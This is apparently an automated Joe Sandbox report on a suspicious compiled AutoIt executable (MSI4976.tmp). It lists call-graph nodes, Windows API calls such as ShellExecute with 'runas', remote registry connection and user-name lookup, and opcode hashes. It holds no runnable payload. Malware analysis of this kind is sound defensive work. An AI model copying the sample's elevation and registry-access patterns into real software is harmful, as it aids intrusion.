36b020 48 API calls 91479->91501 91502 37e713 411 API calls Mailbox 91479->91502 91480->91479 91481->91479 91482->91479 91483->91479 91484->91479 91485->91479 91486->91479 91487->91479 91488->91479 91489->91479 91490->91479 91491->91479 91492->91479 91493->91479 91494->91479 91495->91479 91496->91479 91497->91479 91498->91479 91499->91479 91500->91479 91501->91479 91502->91479 91503->91442 91504->91444 91505->91475 91506->91467 91507->91441 91508->91451 91509->91445 91510->91457 91511->91465 91512 3229c2 91513 3229cb 91512->91513 91514 322a48 91513->91514 91515 3229e9 91513->91515 91553 322a46 91513->91553 91517 322a4e 91514->91517 91518 392307 91514->91518 91519 3229f6 91515->91519 91520 322aac PostQuitMessage 91515->91520 91516 322a2b NtdllDefWindowProc_W 91546 322a39 91516->91546 91521 322a53 91517->91521 91522 322a76 SetTimer RegisterClipboardFormatW 91517->91522 91567 32322e 16 API calls 91518->91567 91524 322a01 91519->91524 91525 39238f 91519->91525 91520->91546 91526 3922aa 91521->91526 91527 322a5a KillTimer 91521->91527 91529 322a9f CreatePopupMenu 91522->91529 91522->91546 91530 322ab6 91524->91530 91531 322a09 91524->91531 91573 3657fb 60 API calls _memset 91525->91573 91537 3922af 91526->91537 91538 3922e3 MoveWindow 91526->91538 91564 322b94 Shell_NotifyIconW _memset 91527->91564 91528 39232e 91568 33ec33 411 API calls Mailbox 91528->91568 91529->91546 91557 321e58 91530->91557 91535 322a14 91531->91535 91542 392374 91531->91542 91543 322a1f 91535->91543 91544 39235f 91535->91544 91539 3922b3 91537->91539 91540 3922d2 SetFocus 91537->91540 91538->91546 91539->91543 91547 3922bc 91539->91547 91540->91546 91541 322a6d 91565 322ac7 DeleteObject DestroyWindow Mailbox 91541->91565 91542->91516 91572 35b31f 48 API calls 91542->91572 91543->91516 91569 322b94 Shell_NotifyIconW _memset 91543->91569 91571 365fdb 70 API calls _memset 91544->91571 91545 3923a1 91545->91516 91545->91546 91566 32322e 16 API calls 91547->91566 91552 39236f 91552->91546 91553->91516 91555 392353 91570 323598 67 API calls _memset 91555->91570 91558 321ef1 91557->91558 91559 321e6f _memset 91557->91559 91558->91546 91574 3238e4 91559->91574 91561 321eda KillTimer SetTimer 91561->91558 91562 321e96 91562->91561 91563 394518 Shell_NotifyIconW 91562->91563 91563->91561 91564->91541 91565->91546 91566->91546 91567->91528 91568->91543 91569->91555 91570->91553 91571->91552 91572->91553 91573->91545 91575 323900 91574->91575 91595 3239d5 Mailbox 91574->91595 91576 327b6e 48 API calls 91575->91576 91577 32390e 91576->91577 91578 39453f LoadStringW 91577->91578 91579 32391b 91577->91579 91582 394559 91578->91582 91580 327e53 48 API calls 91579->91580 91581 323930 91580->91581 91581->91582 91583 323941 91581->91583 91597 3239e8 48 API calls 2 library calls 91582->91597 91585 3239da 91583->91585 91586 32394b 91583->91586 91588 32c935 48 API calls 91585->91588 91596 3239e8 48 API calls 2 library calls 91586->91596 91587 394564 91590 394578 91587->91590 91593 323956 _memset _wcscpy 91587->91593 91588->91593 91598 3239e8 48 API calls 2 library calls 91590->91598 91592 394586 91594 3239ba Shell_NotifyIconW 91593->91594 91594->91595 91595->91562 91596->91593 91597->91587 91598->91592 91599 391e8b 91604 33e44f 91599->91604 91603 391e9a 91605 34010a 48 API calls 91604->91605 91606 33e457 91605->91606 91607 33e46b 91606->91607 91612 33e74b 91606->91612 91611 341b2a 52 API calls __cinit 91607->91611 91611->91603 91613 33e463 91612->91613 91614 33e754 91612->91614 91616 33e47b 91613->91616 91644 341b2a 52 API calls __cinit 91614->91644 91617 32d3d2 48 API calls 91616->91617 91618 33e492 GetVersionExW 91617->91618 91619 327e53 48 API calls 91618->91619 91620 33e4d5 91619->91620 91645 33e5f8 91620->91645 91623 33e617 48 API calls 91626 33e4e9 91623->91626 91624 3929f9 91626->91624 91649 33e6d1 91626->91649 91628 33e576 91630 33e59e 91628->91630 91631 33e5ec GetSystemInfo 91628->91631 91629 33e55f GetCurrentProcess 91658 33e70e LoadLibraryA GetProcAddress 91629->91658 91652 33e694 91630->91652 91633 33e5c9 91631->91633 91636 33e5d7 FreeLibrary 91633->91636 91637 33e5dc 91633->91637 91636->91637 91637->91607 91638 33e5e4 GetSystemInfo 91640 33e5be 91638->91640 91639 33e5b4 91655 33e437 91639->91655 91640->91633 91643 33e5c4 FreeLibrary 91640->91643 91643->91633 91644->91613 91646 33e601 91645->91646 91647 32a2fb 48 API calls 91646->91647 91648 33e4dd 91647->91648 91648->91623 91659 33e6e3 91649->91659 91663 33e6a6 91652->91663 91656 33e694 2 API calls 91655->91656 91657 33e43f GetNativeSystemInfo 91656->91657 91657->91640 91658->91628 91660 33e55b 91659->91660 91661 33e6ec LoadLibraryA 91659->91661 91660->91628 91660->91629 91661->91660 91662 33e6fd GetProcAddress 91661->91662 91662->91660 91664 33e5ac 91663->91664 91665 33e6af LoadLibraryA 91663->91665 91664->91638 91664->91639 91665->91664 91666 33e6c0 GetProcAddress 91665->91666 91666->91664 91667 391eca 91672 33be17 91667->91672 91671 391ed9 91673 32d3d2 48 API calls 91672->91673 91674 33be85 91673->91674 91680 33c929 91674->91680 91676 33bf22 91677 33bf3e 91676->91677 91683 33c8b7 48 API calls _memmove 91676->91683 91679 341b2a 52 API calls __cinit 91677->91679 91679->91671 91684 33c955 91680->91684 91683->91676 91685 33c948 91684->91685 91686 33c962 91684->91686 91685->91676 91686->91685 91687 33c969 RegOpenKeyExW 91686->91687 91687->91685 91688 33c983 RegQueryValueExW 91687->91688 91689 33c9a4 91688->91689 91690 33c9b9 RegCloseKey 91688->91690 91689->91690 91690->91685 91691 346a80 91692 346a8c _flsall 91691->91692 91728 348b7b GetStartupInfoW 91692->91728 91695 346a91 91730 34a937 GetProcessHeap 91695->91730 91696 346ae9 91697 346af4 91696->91697 91815 346bd0 47 API calls 3 library calls 91696->91815 91731 3487d7 91697->91731 91700 346afa 91702 346b05 __RTC_Initialize 91700->91702 91816 346bd0 47 API calls 3 library calls 91700->91816 91752 34ba66 91702->91752 91704 346b14 91705 346b20 GetCommandLineW 91704->91705 91817 346bd0 47 API calls 3 library calls 91704->91817 91771 353c2d GetEnvironmentStringsW 91705->91771 91708 346b1f 91708->91705 91712 346b45 91784 353a64 91712->91784 91716 346b56 91798 341db5 91716->91798 91719 346b5e 91729 348b91 91728->91729 91729->91695 91730->91696 91823 341e5a 30 API calls 2 library calls 91731->91823 91733 3487dc 91824 348ab3 InitializeCriticalSectionAndSpinCount 91733->91824 91735 3487e1 91736 3487e5 91735->91736 91826 348afd TlsAlloc 91735->91826 91825 34884d 50 API calls 2 library calls 91736->91825 91739 3487f7 91739->91736 91741 348802 91739->91741 91740 3487ea 91740->91700 91827 347616 91741->91827 91744 348844 91835 34884d 50 API calls 2 library calls 91744->91835 91747 348823 91747->91744 91749 348829 91747->91749 91748 348849 91748->91700 91834 348724 47 API calls 4 library calls 91749->91834 91751 348831 GetCurrentThreadId 91751->91700 91753 34ba72 _flsall 91752->91753 91844 348984 91753->91844 91755 34ba79 91756 347616 __calloc_crt 47 API calls 91755->91756 91757 34ba8a 91756->91757 91758 34baf5 GetStartupInfoW 91757->91758 91759 34ba95 _flsall @_EH4_CallFilterFunc@8 91757->91759 91762 34bc33 91758->91762 91768 34bb0a 91758->91768 91759->91704 91760 34bcf7 91851 34bd0b RtlLeaveCriticalSection _doexit 91760->91851 91762->91760 91764 34bc7c GetStdHandle 91762->91764 91766 34bc8e GetFileType 91762->91766 91767 34bcbb InitializeCriticalSectionAndSpinCount 91762->91767 91763 34bb58 91763->91762 91769 34bb98 InitializeCriticalSectionAndSpinCount 91763->91769 91770 34bb8a GetFileType 91763->91770 91764->91762 91765 347616 __calloc_crt 47 API calls 91765->91768 91766->91762 91767->91762 91768->91762 91768->91763 91768->91765 91769->91763 91770->91763 91770->91769 91772 346b30 91771->91772 91773 353c3e 91771->91773 91778 35382b GetModuleFileNameW 91772->91778 91890 347660 47 API calls __malloc_crt 91773->91890 91776 353c64 _memmove 91777 353c7a FreeEnvironmentStringsW 91776->91777 91777->91772 91779 35385f _wparse_cmdline 91778->91779 91780 346b3a 91779->91780 91781 353899 91779->91781 91780->91712 91818 341d7b 47 API calls 3 library calls 91780->91818 91891 347660 47 API calls __malloc_crt 91781->91891 91783 35389f _wparse_cmdline 91783->91780 91785 353a7d __NMSG_WRITE 91784->91785 91789 346b4b 91784->91789 91786 347616 __calloc_crt 47 API calls 91785->91786 91794 353aa6 __NMSG_WRITE 91786->91794 91787 353afd 91788 3428ca _free 47 API calls 91787->91788 91788->91789 91789->91716 91819 341d7b 47 API calls 3 library calls 91789->91819 91790 347616 __calloc_crt 47 API calls 91790->91794 91791 353b22 91793 3428ca _free 47 API calls 91791->91793 91793->91789 91794->91787 91794->91789 91794->91790 91794->91791 91795 353b39 91794->91795 91892 353317 47 API calls ___crtsetenv 91794->91892 91893 347ab0 IsProcessorFeaturePresent 91795->91893 91799 341dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 91798->91799 91801 341e00 __IsNonwritableInCurrentImage 91799->91801 91916 341b2a 52 API calls __cinit 91799->91916 91801->91719 91815->91697 91816->91702 91817->91708 91823->91733 91824->91735 91825->91740 91826->91739 91829 34761d 91827->91829 91830 34765a 91829->91830 91831 34763b Sleep 91829->91831 91836 353e5a 91829->91836 91830->91744 91833 348b59 TlsSetValue 91830->91833 91832 347652 91831->91832 91832->91829 91832->91830 91833->91747 91834->91751 91835->91748 91837 353e65 91836->91837 91838 353e80 __calloc_impl 91836->91838 91837->91838 91839 353e71 91837->91839 91841 353e90 RtlAllocateHeap 91838->91841 91842 353e76 91838->91842 91843 34889e 47 API calls __getptd_noexit 91839->91843 91841->91838 91841->91842 91842->91829 91843->91842 91845 348995 91844->91845 91846 3489a8 RtlEnterCriticalSection 91844->91846 91852 348a0c 91845->91852 91846->91755 91848 34899b 91848->91846 91876 341d7b 47 API calls 3 library calls 91848->91876 91851->91759 91853 348a18 _flsall 91852->91853 91854 348a21 91853->91854 91855 348a39 91853->91855 91877 348e52 47 API calls 2 library calls 91854->91877 91856 348aa1 _flsall 91855->91856 91868 348a37 91855->91868 91856->91848 91859 348a26 91878 348eb2 47 API calls 6 library calls 91859->91878 91860 348a4d 91862 348a54 91860->91862 91863 348a63 91860->91863 91881 34889e 47 API calls __getptd_noexit 91862->91881 91867 348984 __lock 46 API calls 91863->91867 91864 348a2d 91879 341d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 91864->91879 91870 348a6a 91867->91870 91868->91855 91880 347660 47 API calls __malloc_crt 91868->91880 91869 348a59 91869->91856 91871 348a8e 91870->91871 91872 348a79 InitializeCriticalSectionAndSpinCount 91870->91872 91882 3428ca 91871->91882 91873 348a94 91872->91873 91888 348aaa RtlLeaveCriticalSection _doexit 91873->91888 91877->91859 91878->91864 91880->91860 91881->91869 91883 3428d3 RtlFreeHeap 91882->91883 91887 3428fc __dosmaperr 91882->91887 91884 3428e8 91883->91884 91883->91887 91889 34889e 47 API calls __getptd_noexit 91884->91889 91886 3428ee GetLastError 91886->91887 91887->91873 91888->91856 91889->91886 91890->91776 91891->91783 91892->91794 91894 347abb 91893->91894 91916->91801 92732 391eed 92737 33e975 92732->92737 92734 391f01 92753 341b2a 52 API calls __cinit 92734->92753 92736 391f0b 92738 34010a 48 API calls 92737->92738 92739 33ea27 GetModuleFileNameW 92738->92739 92740 34297d __wsplitpath 47 API calls 92739->92740 92741 33ea5b _wcsncat 92740->92741 92754 342bff 92741->92754 92744 34010a 48 API calls 92745 33ea94 _wcscpy 92744->92745 92746 32d3d2 48 API calls 92745->92746 92747 33eacf 92746->92747 92757 33eb05 92747->92757 92749 33eae0 Mailbox 92749->92734 92750 32a4f6 48 API calls 92752 33eada _wcscat __NMSG_WRITE _wcsncpy 92750->92752 92751 34010a 48 API calls 92751->92752 92752->92749 92752->92750 92752->92751 92753->92736 92771 34aab9 92754->92771 92758 32c4cd 48 API calls 92757->92758 92759 33eb14 RegOpenKeyExW 92758->92759 92760 33eb35 92759->92760 92761 394b17 RegQueryValueExW 92759->92761 92760->92752 92762 394b91 RegCloseKey 92761->92762 92763 394b30 92761->92763 92764 34010a 48 API calls 92763->92764 92765 394b49 92764->92765 92766 324bce 48 API calls 92765->92766 92767 394b53 RegQueryValueExW 92766->92767 92768 394b86 92767->92768 92769 394b6f 92767->92769 92768->92762 92770 327e53 48 API calls 92769->92770 92770->92768 92772 34abc6 92771->92772 92773 34aaca 92771->92773 92781 34889e 47 API calls __getptd_noexit 92772->92781 92773->92772 92779 34aad5 92773->92779 92775 34abbb 92782 347aa0 8 API calls ___crtsetenv 92775->92782 92777 33ea8a 92777->92744 92779->92777 92780 34889e 47 API calls __getptd_noexit 92779->92780 92780->92775 92781->92775 92782->92777 92783 32e849 92786 3326c0 92783->92786 92785 32e852 92787 39862d 92786->92787 92788 33273b 92786->92788 92908 36d520 86 API calls 4 library calls 92787->92908 92793 332adc 92788->92793 92794 33277c 92788->92794 92803 33279a 92788->92803 92790 39863e 92909 36d520 86 API calls 4 library calls 92790->92909 92791 332a84 92800 32d380 55 API calls 92791->92800 92792 3327cf 92792->92790 92796 3327db 92792->92796 92907 32d349 53 API calls 92793->92907 92831 3328f6 92794->92831 92903 32d500 53 API calls __cinit 92794->92903 92797 3327ef 92796->92797 92812 39865a 92796->92812 92801 332806 92797->92801 92802 3986c9 92797->92802 92804 332aab 92800->92804 92805 32fa40 411 API calls 92801->92805 92806 398ac9 92802->92806 92809 32fa40 411 API calls 92802->92809 92803->92791 92803->92792 92815 332914 92803->92815 92808 32d2d2 53 API calls 92804->92808 92843 33281d 92805->92843 92924 36d520 86 API calls 4 library calls 92806->92924 92808->92815 92810 3986ee 92809->92810 92817 32d89e 50 API calls 92810->92817 92823 39870a 92810->92823 92826 3329ec 92810->92826 92812->92802 92812->92826 92910 37f211 411 API calls 92812->92910 92911 37f4df 411 API calls 92812->92911 92813 398980 92919 36d520 86 API calls 4 library calls 92813->92919 92818 32cdb4 48 API calls 92815->92818 92816 332836 92816->92806 92821 32fa40 411 API calls 92816->92821 92817->92823 92827 33296e 92818->92827 92820 3328cc 92820->92831 92904 32cf97 58 API calls 92820->92904 92846 33287c 92821->92846 92822 32c935 48 API calls 92822->92816 92829 39878d 92823->92829 92912 32346e 48 API calls 92823->92912 92825 3328ac 92825->92820 92917 32cf97 58 API calls 92825->92917 92826->92785 92827->92826 92835 332984 92827->92835 92836 398a97 92827->92836 92842 3989b4 92827->92842 92830 39883f 92829->92830 92834 39882d 92829->92834 92913 364e71 53 API calls __cinit 92829->92913 92915 37c235 411 API calls Mailbox 92830->92915 92840 332900 92831->92840 92918 32cf97 58 API calls 92831->92918 92837 32ca8e 48 API calls 92834->92837 92835->92836 92905 3341fc 84 API calls 92835->92905 92836->92826 92923 324b02 50 API calls 92836->92923 92837->92830 92838 398888 92838->92843 92844 39888c 92838->92844 92840->92813 92840->92815 92889 37bf80 92842->92889 92843->92816 92843->92822 92843->92826 92916 36d520 86 API calls 4 library calls 92844->92916 92846->92825 92846->92826 92851 32fa40 411 API calls 92846->92851 92849 3329b8 92852 398a7e 92849->92852 92906 3341fc 84 API calls 92849->92906 92858 3988ff 92851->92858 92922 33ee93 84 API calls 92852->92922 92853 398725 92853->92834 92864 3314a0 48 API calls 92853->92864 92854 3989f3 92870 398a01 92854->92870 92871 398a42 92854->92871 92855 3987ca 92856 398813 92855->92856 92860 3284a6 81 API calls 92855->92860 92862 32d89e 50 API calls 92856->92862 92858->92826 92865 32d89e 50 API calls 92858->92865 92878 3987e0 92860->92878 92861 3329ca 92861->92826 92866 398a6f 92861->92866 92867 3329e5 92861->92867 92863 398821 92862->92863 92868 32d89e 50 API calls 92863->92868 92869 39875d 92864->92869 92865->92825 92921 37d1da 50 API calls 92866->92921 92872 34010a 48 API calls 92867->92872 92868->92834 92869->92834 92876 3314a0 48 API calls 92869->92876 92873 32ca8e 48 API calls 92870->92873 92874 32d89e 50 API calls 92871->92874 92872->92826 92873->92826 92877 398a4b 92874->92877 92879 398775 92876->92879 92880 32d89e 50 API calls 92877->92880 92878->92856 92914 36a76d 49 API calls 92878->92914 92882 32d89e 50 API calls 92879->92882 92883 398a57 92880->92883 92885 398781 92882->92885 92920 324b02 50 API calls 92883->92920 92884 398807 92887 32d89e 50 API calls 92884->92887 92888 32d89e 50 API calls 92885->92888 92887->92856 92888->92829 92894 37bfd9 _memset 92889->92894 92891 37c22e 92891->92854 92892 37c14c 92893 37c033 92892->92893 92895 37c19f VariantInit VariantClear 92892->92895 92927 37c235 411 API calls Mailbox 92893->92927 92894->92892 92894->92893 92897 37c097 VariantInit 92894->92897 92896 37c1c5 92895->92896 92896->92893 92898 37c1e6 92896->92898 92901 37c0d6 92897->92901 92926 36a6f6 103 API calls 92898->92926 92900 37c20d VariantClear 92900->92891 92901->92893 92925 36a6f6 103 API calls 92901->92925 92903->92803 92904->92831 92905->92849 92906->92861 92907->92825 92908->92790 92909->92812 92910->92812 92911->92812 92912->92853 92913->92855 92914->92884 92915->92838 92916->92826 92917->92820 92918->92840 92919->92826 92920->92826 92921->92852 92922->92836 92923->92806 92924->92826 92925->92892 92926->92900 92927->92891 92928 333588 92932 33308b 92928->92932 92929 3335b0 92954 32203a 411 API calls 92929->92954 92930 37d154 48 API calls 92930->92932 92932->92929 92932->92930 92934 39848d 92932->92934 92938 323320 48 API calls 92932->92938 92944 398478 92932->92944 92946 333665 92932->92946 92947 32fa40 411 API calls 92932->92947 92948 3984a4 92932->92948 92951 3335f0 92932->92951 92953 3331dc 92932->92953 92955 35a599 InterlockedDecrement 92932->92955 92956 32346e 48 API calls 92932->92956 92959 36d520 86 API calls 4 library calls 92934->92959 92936 33366d 92942 3332b9 92936->92942 92962 36d520 86 API calls 4 library calls 92936->92962 92938->92932 92943 39833f VariantClear 92943->92953 92958 36d520 86 API calls 4 library calls 92944->92958 92957 36d520 86 API calls 4 library calls 92946->92957 92947->92932 92960 36d520 86 API calls 4 library calls 92948->92960 92950 3984b0 92950->92942 92961 36d520 86 API calls 4 library calls 92950->92961 92952 32c935 48 API calls 92951->92952 92952->92953 92953->92936 92953->92942 92953->92943 92953->92950 92954->92953 92955->92932 92956->92932 92957->92942 92958->92942 92959->92942 92960->92950 92961->92942 92962->92942 92963 39bc25 92964 39bc27 92963->92964 92967 3679f8 SHGetFolderPathW 92964->92967 92966 39bc30 92966->92966 92968 327e53 48 API calls 92967->92968 92969 367a25 92968->92969 92969->92966 92970 39c146 GetUserNameW

                                        Executed Functions

                                        Function 0032374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0032376D
                                          • Part of subcall function 00324257: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI4976.tmp,00000104,?,00000000,00000001,00000000), ref: 0032428C
                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 0032377F
                                        • GetFullPathNameW.KERNEL32(C:\Windows\Installer\MSI4976.tmp,00000104,?,003E1120,C:\Windows\Installer\MSI4976.tmp,003E1124,?,?), ref: 003237EE
                                          • Part of subcall function 003234F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0032352A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00323860
                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,003D2934,00000010), ref: 003921C5
                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 003921FD
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00392232
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003BDAA4), ref: 00392290
                                        • ShellExecuteW.SHELL32(00000000), ref: 00392297
                                          • Part of subcall function 003230A5: GetSysColorBrush.USER32(0000000F), ref: 003230B0
                                          • Part of subcall function 003230A5: LoadCursorW.USER32(00000000,00007F00), ref: 003230BF
                                          • Part of subcall function 003230A5: LoadIconW.USER32(00000063), ref: 003230D5
                                          • Part of subcall function 003230A5: LoadIconW.USER32(000000A4), ref: 003230E7
                                          • Part of subcall function 003230A5: LoadIconW.USER32(000000A2), ref: 003230F9
                                          • Part of subcall function 003230A5: RegisterClassExW.USER32(?), ref: 00323167
                                          • Part of subcall function 00322E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00322ECB
                                          • Part of subcall function 00322E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00322EEC
                                          • Part of subcall function 00322E9D: ShowWindow.USER32(00000000), ref: 00322F00
                                          • Part of subcall function 00322E9D: ShowWindow.USER32(00000000), ref: 00322F09
                                          • Part of subcall function 00323598: _memset.LIBCMT ref: 003235BE
                                          • Part of subcall function 00323598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00323667
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                        • String ID: C:\Windows\Installer\MSI4976.tmp$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$">
                                        • API String ID: 4253510256-1924644571
                                        • Opcode ID: f231bb50a817db2519a4f3b93a448edf1bb18400fa49b967bfc076e3c6bbb03e
                                        • Instruction ID: fc50768da57f0a53848de52cd11edd0ecb9169e0540bd6470a37553ea48ba759
                                        • Opcode Fuzzy Hash: f231bb50a817db2519a4f3b93a448edf1bb18400fa49b967bfc076e3c6bbb03e
                                        • Instruction Fuzzy Hash: B85129756442A4BACF13ABA0FC86FEE7B7C9B15700F000156F6429E1E1D7744A48DB62
                                        Function 003830AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1168 3830ad-38315b call 32ca8e call 32d3d2 * 3 call 3284a6 call 383d7b call 383af7 1183 38315d-383161 1168->1183 1184 383166-383170 1168->1184 1185 3831e6-3831f2 call 36d7e4 1183->1185 1186 3831a2 1184->1186 1187 383172-383187 RegConnectRegistryW 1184->1187 1197 383504-383527 call 325cd3 * 3 1185->1197 1188 3831a6-3831c3 RegOpenKeyExW 1186->1188 1190 383189-38319a call 327ba9 1187->1190 1191 38319c-3831a0 1187->1191 1192 3831c5-3831d7 call 327ba9 1188->1192 1193 3831f7-383227 call 3284a6 RegQueryValueExW 1188->1193 1190->1185 1191->1188 1204 3831d9-3831dd RegCloseKey 1192->1204 1205 3831e3-3831e4 1192->1205 1206 383229-383239 call 327ba9 1193->1206 1207 38323e-383254 call 327ba9 1193->1207 1204->1205 1205->1185 1217 3834df-3834e6 call 36d7e4 1206->1217 1214 38325a-38325f 1207->1214 1215 3834dc-3834dd 1207->1215 1218 38344c-383498 call 34010a call 3284a6 RegQueryValueExW 1214->1218 1219 383265-383268 1214->1219 1215->1217 1225 3834eb-3834fc RegCloseKey 1217->1225 1241 38349a-3834a6 1218->1241 1242 3834b4-3834ce call 327ba9 call 36d7e4 1218->1242 1222 3833d9-383411 call 36ad14 call 3284a6 RegQueryValueExW 1219->1222 1223 38326e-383273 1219->1223 1222->1225 1248 383417-383447 call 327ba9 call 36d7e4 call 332570 1222->1248 1227 383279-38327c 1223->1227 1228 38338d-3833d4 call 3284a6 RegQueryValueExW call 332570 1223->1228 1225->1197 1230 3834fe-383502 RegCloseKey 1225->1230 1232 3832de-38332b call 34010a call 3284a6 RegQueryValueExW 1227->1232 1233 38327e-383281 1227->1233 1228->1225 1230->1197 1232->1242 1258 383331-383348 1232->1258 1233->1215 1237 383287-3832d9 call 3284a6 RegQueryValueExW call 332570 1233->1237 1237->1225 1247 3834aa-3834b2 call 32ca8e 1241->1247 1264 3834d3-3834da call 34017e 1242->1264 1247->1264 1248->1225 1258->1247 1263 38334e-383355 1258->1263 1266 38335c-383361 1263->1266 1267 383357-383358 1263->1267 1264->1225 1270 383363-383367 1266->1270 1271 383376-38337b 1266->1271 1267->1266 1274 383369-38336d 1270->1274 1275 383371-383374 1270->1275 1271->1247 1276 383381-383388 1271->1276 1274->1275 1275->1270 1275->1271 1276->1247
                                        APIs
                                          • Part of subcall function 00383AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038317F
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0038321E
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003832B6
                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003834F5
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00383502
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                        • String ID:
                                        • API String ID: 1240663315-0
                                        • Opcode ID: 91ce6a39cb6d88ec3ac264660b0d896f33e60696ab9145ddeb6301a1383ab9b4
                                        • Instruction ID: 57406d863e5388335cb881500fd073a8723874dca2f925dc92c49d55431cca3b
                                        • Opcode Fuzzy Hash: 91ce6a39cb6d88ec3ac264660b0d896f33e60696ab9145ddeb6301a1383ab9b4
                                        • Instruction Fuzzy Hash: 49E15A35204310AFCB16EF29C895D6ABBE8EF89714F04856DF54ADB361DA30EE05CB52
                                        Function 003229C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1278 3229c2-3229e2 1280 322a42-322a44 1278->1280 1281 3229e4-3229e7 1278->1281 1280->1281 1284 322a46 1280->1284 1282 322a48 1281->1282 1283 3229e9-3229f0 1281->1283 1286 322a4e-322a51 1282->1286 1287 392307-392335 call 32322e call 33ec33 1282->1287 1288 3229f6-3229fb 1283->1288 1289 322aac-322ab4 PostQuitMessage 1283->1289 1285 322a2b-322a33 NtdllDefWindowProc_W 1284->1285 1296 322a39-322a3f 1285->1296 1290 322a53-322a54 1286->1290 1291 322a76-322a9d SetTimer RegisterClipboardFormatW 1286->1291 1325 39233a-392341 1287->1325 1293 322a01-322a03 1288->1293 1294 39238f-3923a3 call 3657fb 1288->1294 1295 322a72-322a74 1289->1295 1297 3922aa-3922ad 1290->1297 1298 322a5a-322a6d KillTimer call 322b94 call 322ac7 1290->1298 1291->1295 1300 322a9f-322aaa CreatePopupMenu 1291->1300 1301 322ab6-322ac0 call 321e58 1293->1301 1302 322a09-322a0e 1293->1302 1294->1295 1319 3923a9 1294->1319 1295->1296 1310 3922af-3922b1 1297->1310 1311 3922e3-392302 MoveWindow 1297->1311 1298->1295 1300->1295 1320 322ac5 1301->1320 1306 322a14-322a19 1302->1306 1307 392374-39237b 1302->1307 1317 39235f-39236f call 365fdb 1306->1317 1318 322a1f-322a25 1306->1318 1307->1285 1315 392381-39238a call 35b31f 1307->1315 1312 3922b3-3922b6 1310->1312 1313 3922d2-3922de SetFocus 1310->1313 1311->1295 1312->1318 1321 3922bc-3922cd call 32322e 1312->1321 1313->1295 1315->1285 1317->1295 1318->1285 1318->1325 1319->1285 1320->1295 1321->1295 1325->1285 1329 392347-39235a call 322b94 call 323598 1325->1329 1329->1285
                                        APIs
